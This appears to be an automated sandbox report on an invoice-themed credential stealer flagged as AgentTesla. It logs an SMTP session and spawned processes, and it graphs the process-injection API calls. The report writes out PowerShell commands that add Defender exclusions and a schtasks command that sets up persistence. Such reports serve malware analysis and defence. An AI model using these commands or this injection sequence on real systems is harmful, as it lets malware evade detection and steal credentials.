                                                                                Apr 16, 2024 14:11:02.905608892 CEST58749738208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                Apr 16, 2024 14:11:02.914140940 CEST49738587192.168.2.4208.91.198.143EHLO 468325
                                                                                Apr 16, 2024 14:11:03.068171978 CEST58749738208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                250-PIPELINING
                                                                                250-SIZE 41648128
                                                                                250-VRFY
                                                                                250-ETRN
                                                                                250-STARTTLS
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-AUTH=PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250-DSN
                                                                                250 CHUNKING
                                                                                Apr 16, 2024 14:11:03.068346977 CEST49738587192.168.2.4208.91.198.143STARTTLS
                                                                                Apr 16, 2024 14:11:03.222124100 CEST58749738208.91.198.143192.168.2.4220 2.0.0 Ready to start TLS

                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:14:10:54
                                                                                Start date:16/04/2024
                                                                                Path:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\TT Invoice copy.exe"
                                                                                Imagebase:0x330000
                                                                                File size:717'312 bytes
                                                                                MD5 hash:BF78F7D9BB46AE5314EC7B6D9E651B23
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1633307056.0000000000332000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:14:10:56
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT Invoice copy.exe"
                                                                                Imagebase:0xce0000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:14:10:56
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:14:10:56
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                                                                                Imagebase:0xce0000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:14:10:56
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:14:10:56
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3165.tmp"
                                                                                Imagebase:0x9e0000
                                                                                File size:187'904 bytes
                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:14:10:57
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:8
                                                                                Start time:14:10:57
                                                                                Start date:16/04/2024
                                                                                Path:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\TT Invoice copy.exe"
                                                                                Imagebase:0x6e0000
                                                                                File size:717'312 bytes
                                                                                MD5 hash:BF78F7D9BB46AE5314EC7B6D9E651B23
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2889363476.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2889363476.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:9
                                                                                Start time:14:10:57
                                                                                Start date:16/04/2024
                                                                                Path:C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                                                Imagebase:0x180000
                                                                                File size:717'312 bytes
                                                                                MD5 hash:BF78F7D9BB46AE5314EC7B6D9E651B23
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 47%, ReversingLabs
                                                                                • Detection: 51%, Virustotal, Browse
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:10
                                                                                Start time:14:10:59
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                Imagebase:0x7ff693ab0000
                                                                                File size:496'640 bytes
                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:11
                                                                                Start time:14:11:00
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pUAQmWA" /XML "C:\Users\user\AppData\Local\Temp\tmp3E66.tmp"
                                                                                Imagebase:0x9e0000
                                                                                File size:187'904 bytes
                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:12
                                                                                Start time:14:11:00
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:13
                                                                                Start time:14:11:00
                                                                                Start date:16/04/2024
                                                                                Path:C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\pUAQmWA.exe"
                                                                                Imagebase:0xdd0000
                                                                                File size:717'312 bytes
                                                                                MD5 hash:BF78F7D9BB46AE5314EC7B6D9E651B23
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2888895822.000000000334B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:16
                                                                                Start time:14:11:21
                                                                                Start date:16/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:8.5%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:125
                                                                                  Total number of Limit Nodes:12
                                                                                  execution_graph 24188 e31603 24189 e3158c 24188->24189 24190 e315ad 24189->24190 24191 e34428 6 API calls 24189->24191 24192 e3448e 6 API calls 24189->24192 24191->24190 24192->24190 24030 e31862 24031 e3158c 24030->24031 24032 e315ad 24031->24032 24035 e34428 24031->24035 24050 e3448e 24031->24050 24036 e34442 24035->24036 24037 e3444a 24036->24037 24066 e34d9e 24036->24066 24070 e34e79 24036->24070 24074 e34f9b 24036->24074 24080 e34d56 24036->24080 24086 e34db1 24036->24086 24090 e348b2 24036->24090 24094 e34eb2 24036->24094 24097 e34d6d 24036->24097 24101 e350a7 24036->24101 24104 e34827 24036->24104 24109 e34883 24036->24109 24113 e349bd 24036->24113 24037->24032 24051 e3441c 24050->24051 24052 e34491 24050->24052 24053 e34883 Wow64SetThreadContext 24051->24053 24054 e3444a 24051->24054 24055 e34827 2 API calls 24051->24055 24056 e350a7 WriteProcessMemory 24051->24056 24057 e34d6d ResumeThread 24051->24057 24058 e34eb2 VirtualAllocEx 24051->24058 24059 e348b2 Wow64SetThreadContext 24051->24059 24060 e34db1 ReadProcessMemory 24051->24060 24061 e34d56 2 API calls 24051->24061 24062 e34f9b 2 API calls 24051->24062 24063 e34e79 ResumeThread 24051->24063 24064 e34d9e ResumeThread 24051->24064 24065 e349bd WriteProcessMemory 24051->24065 24052->24032 24053->24054 24054->24032 24055->24054 24056->24054 24057->24054 24058->24054 24059->24054 24060->24054 24061->24054 24062->24054 24063->24054 24064->24054 24065->24054 24067 e34d74 24066->24067 24116 e30ca0 24067->24116 24071 e34e86 24070->24071 24073 e30ca0 ResumeThread 24071->24073 24072 e3527e 24073->24072 24075 e34fb7 24074->24075 24124 e30ee8 24075->24124 24076 e3489e 24076->24037 24077 e3488c 24077->24076 24120 e30d50 24077->24120 24081 e34df2 24080->24081 24082 e34d74 24080->24082 24084 e30d50 Wow64SetThreadContext 24081->24084 24085 e30ca0 ResumeThread 24082->24085 24083 e3527e 24084->24082 24085->24083 24128 e30fd8 24086->24128 24088 e34987 24088->24037 24092 e3488c 24090->24092 24091 e3489e 24091->24037 24092->24090 24092->24091 24093 e30d50 Wow64SetThreadContext 24092->24093 24093->24092 24132 e30e28 24094->24132 24098 e34d73 24097->24098 24100 e30ca0 ResumeThread 24098->24100 24099 e3527e 24100->24099 24103 e30ee8 WriteProcessMemory 24101->24103 24102 e350d5 24103->24102 24136 e31170 24104->24136 24110 e3488c 24109->24110 24111 e3489e 24110->24111 24112 e30d50 Wow64SetThreadContext 24110->24112 24111->24037 24112->24110 24115 e30ee8 WriteProcessMemory 24113->24115 24114 e348de 24114->24037 24115->24114 24117 e30ce0 ResumeThread 24116->24117 24119 e30d11 24117->24119 24121 e30d95 Wow64SetThreadContext 24120->24121 24123 e30ddd 24121->24123 24123->24077 24125 e30f30 WriteProcessMemory 24124->24125 24127 e30f87 24125->24127 24127->24077 24129 e31023 ReadProcessMemory 24128->24129 24131 e31067 24129->24131 24131->24086 24131->24088 24133 e30e68 VirtualAllocEx 24132->24133 24135 e30ea5 24133->24135 24135->24037 24137 e311f9 24136->24137 24137->24137 24138 e3135e CreateProcessA 24137->24138 24139 e313bb 24138->24139 24140 e6e860 24141 e6e8a6 GetCurrentProcess 24140->24141 24143 e6e8f1 24141->24143 24144 e6e8f8 GetCurrentThread 24141->24144 24143->24144 24145 e6e935 GetCurrentProcess 24144->24145 24146 e6e92e 24144->24146 24147 e6e96b GetCurrentThreadId 24145->24147 24146->24145 24149 e6e9c4 24147->24149 24193 e6c7c0 24194 e6c802 24193->24194 24195 e6c808 GetModuleHandleW 24193->24195 24194->24195 24196 e6c835 24195->24196 24181 e35678 24182 e35803 24181->24182 24184 e3569e 24181->24184 24184->24182 24185 e328c4 24184->24185 24186 e358f8 PostMessageW 24185->24186 24187 e35964 24186->24187 24187->24184 24150 e647e8 24152 e64804 24150->24152 24151 e6487e 24152->24151 24154 e649b0 24152->24154 24155 e649d5 24154->24155 24159 e64ac0 24155->24159 24163 e64aaf 24155->24163 24161 e64ae7 24159->24161 24160 e64bc4 24161->24160 24167 e64660 24161->24167 24164 e64ae7 24163->24164 24165 e64660 CreateActCtxA 24164->24165 24166 e64bc4 24164->24166 24165->24166 24168 e65b50 CreateActCtxA 24167->24168 24170 e65c13 24168->24170 24171 e6eaa8 DuplicateHandle 24172 e6eb3e 24171->24172 24173 e6c868 24174 e6c87c 24173->24174 24176 e6c8a1 24174->24176 24177 e6c280 24174->24177 24178 e6ca48 LoadLibraryExW 24177->24178 24180 e6cac1 24178->24180 24180->24176

                                                                                  Executed Functions

                                                                                  Function 00E34927 Relevance: .0, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 84a75c002e409e81dcc1140e8e773326adeb387274d672c58b4f215165e5a6e7
                                                                                  • Instruction ID: 29b0b2872682690d9ec913db948d78ae57372acafab4279e6163d7c65548f8a9
                                                                                  • Opcode Fuzzy Hash: 84a75c002e409e81dcc1140e8e773326adeb387274d672c58b4f215165e5a6e7
                                                                                  • Instruction Fuzzy Hash: 33E0327594DA40CFC7108F90C84C0F9BFB8AB4B342F2130A2E40AAB363DA208801EE04
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E6E860 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 558 e6e860-e6e8ef GetCurrentProcess 562 e6e8f1-e6e8f7 558->562 563 e6e8f8-e6e92c GetCurrentThread 558->563 562->563 564 e6e935-e6e969 GetCurrentProcess 563->564 565 e6e92e-e6e934 563->565 567 e6e972-e6e98a 564->567 568 e6e96b-e6e971 564->568 565->564 570 e6e993-e6e9c2 GetCurrentThreadId 567->570 568->567 572 e6e9c4-e6e9ca 570->572 573 e6e9cb-e6ea2d 570->573 572->573
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E6E8DE
                                                                                  • GetCurrentThread.KERNEL32 ref: 00E6E91B
                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E6E958
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E6E9B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: 08929212f68db6d0603134b29b7b75f9c583db2c5ce34ae822424bcff552d150
                                                                                  • Instruction ID: 0a1b8e808dea0e4107463cf2141c4e43a1f8947d593e8b013c78f36dd7354eca
                                                                                  • Opcode Fuzzy Hash: 08929212f68db6d0603134b29b7b75f9c583db2c5ce34ae822424bcff552d150
                                                                                  • Instruction Fuzzy Hash: A65166B49002098FDB44DFAAD548BDEBBF1EF88314F20C459E059A73A1D7749944CF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E31170 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 708 e31170-e31205 710 e31207-e31211 708->710 711 e3123e-e3125e 708->711 710->711 712 e31213-e31215 710->712 718 e31260-e3126a 711->718 719 e31297-e312c6 711->719 714 e31217-e31221 712->714 715 e31238-e3123b 712->715 716 e31223 714->716 717 e31225-e31234 714->717 715->711 716->717 717->717 720 e31236 717->720 718->719 721 e3126c-e3126e 718->721 725 e312c8-e312d2 719->725 726 e312ff-e313b9 CreateProcessA 719->726 720->715 723 e31291-e31294 721->723 724 e31270-e3127a 721->724 723->719 727 e3127e-e3128d 724->727 728 e3127c 724->728 725->726 729 e312d4-e312d6 725->729 739 e313c2-e31448 726->739 740 e313bb-e313c1 726->740 727->727 730 e3128f 727->730 728->727 731 e312f9-e312fc 729->731 732 e312d8-e312e2 729->732 730->723 731->726 734 e312e6-e312f5 732->734 735 e312e4 732->735 734->734 736 e312f7 734->736 735->734 736->731 750 e3144a-e3144e 739->750 751 e31458-e3145c 739->751 740->739 750->751 752 e31450 750->752 753 e3145e-e31462 751->753 754 e3146c-e31470 751->754 752->751 753->754 755 e31464 753->755 756 e31472-e31476 754->756 757 e31480-e31484 754->757 755->754 756->757 758 e31478 756->758 759 e31496-e3149d 757->759 760 e31486-e3148c 757->760 758->757 761 e314b4 759->761 762 e3149f-e314ae 759->762 760->759 764 e314b5 761->764 762->761 764->764
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E313A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: fbb06886dfc432176de561018c6a321a6973ed023ca82845fc2eb11070386d7e
                                                                                  • Instruction ID: f51a02bdece69372d4c4464b426956d2d0274452335042ac8c0ad101fa327fd3
                                                                                  • Opcode Fuzzy Hash: fbb06886dfc432176de561018c6a321a6973ed023ca82845fc2eb11070386d7e
                                                                                  • Instruction Fuzzy Hash: 35914871D002198FDF24DFA8C8457EEBBB2EF48314F1485A9E858B7250DB749985CF92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E65B45 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 765 e65b45-e65c11 CreateActCtxA 767 e65c13-e65c19 765->767 768 e65c1a-e65c74 765->768 767->768 775 e65c76-e65c79 768->775 776 e65c83-e65c87 768->776 775->776 777 e65c98 776->777 778 e65c89-e65c95 776->778 780 e65c99 777->780 778->777 780->780
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00E65C01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 621835c3884249a115a93aa312d521ed2f68753c7ec7be194f4ea7fb5cf77ab5
                                                                                  • Instruction ID: 59813fdbba4b4c08da03cf30ea623aa74b5e2e353a812586c49e86b6a6d160de
                                                                                  • Opcode Fuzzy Hash: 621835c3884249a115a93aa312d521ed2f68753c7ec7be194f4ea7fb5cf77ab5
                                                                                  • Instruction Fuzzy Hash: 3E4102B0D00719CEDB24DFA9C844BDEBBF1BF48304F24806AD448AB255DB756985CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E64660 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 781 e64660-e65c11 CreateActCtxA 784 e65c13-e65c19 781->784 785 e65c1a-e65c74 781->785 784->785 792 e65c76-e65c79 785->792 793 e65c83-e65c87 785->793 792->793 794 e65c98 793->794 795 e65c89-e65c95 793->795 797 e65c99 794->797 795->794 797->797
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00E65C01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 4b6fb3fc39835b9b1d809f71ade1b166abfda5036622bb168ffd945861e00cc8
                                                                                  • Instruction ID: 1aa6a092b9d043f722c00d6230f2d011207a9ac1d3c54dcb745d19be372c02d7
                                                                                  • Opcode Fuzzy Hash: 4b6fb3fc39835b9b1d809f71ade1b166abfda5036622bb168ffd945861e00cc8
                                                                                  • Instruction Fuzzy Hash: 3841DFB1D00719CADB24DFA9D844B9EBBB5BF48304F2480AAD408BB255DBB5A945CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E30EE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 798 e30ee8-e30f36 800 e30f46-e30f85 WriteProcessMemory 798->800 801 e30f38-e30f44 798->801 803 e30f87-e30f8d 800->803 804 e30f8e-e30fbe 800->804 801->800 803->804
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 00E30F78
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: fe620dde93fb6b320f50dce8de94faf0a76c9a2f4f4cec80391115f5e8a1f91d
                                                                                  • Instruction ID: 7a19de76536527c7ec5fb7ab126eb5797cb2b03391751f1236d551a5558eb6b9
                                                                                  • Opcode Fuzzy Hash: fe620dde93fb6b320f50dce8de94faf0a76c9a2f4f4cec80391115f5e8a1f91d
                                                                                  • Instruction Fuzzy Hash: C52127B19003599FCB10CFA9C885BDEBFF5FF48324F108429E958A7250C7789944CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E30D50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 808 e30d50-e30d9b 810 e30dab-e30ddb Wow64SetThreadContext 808->810 811 e30d9d-e30da9 808->811 813 e30de4-e30e14 810->813 814 e30ddd-e30de3 810->814 811->810 814->813
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00E30DCE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 5e5d3d99fc0a2a4f2bbba0f728bc383e4f708a834415050cb0f93d666ebf80dd
                                                                                  • Instruction ID: b185983ac6bdd956646a49e221463235073db71bfcaf629d525e3d1f9062c27b
                                                                                  • Opcode Fuzzy Hash: 5e5d3d99fc0a2a4f2bbba0f728bc383e4f708a834415050cb0f93d666ebf80dd
                                                                                  • Instruction Fuzzy Hash: CE2118B1D002098FDB10DFAAC4857EEBFF4EF88324F54842AD459A7241C778A945CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00E30FD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
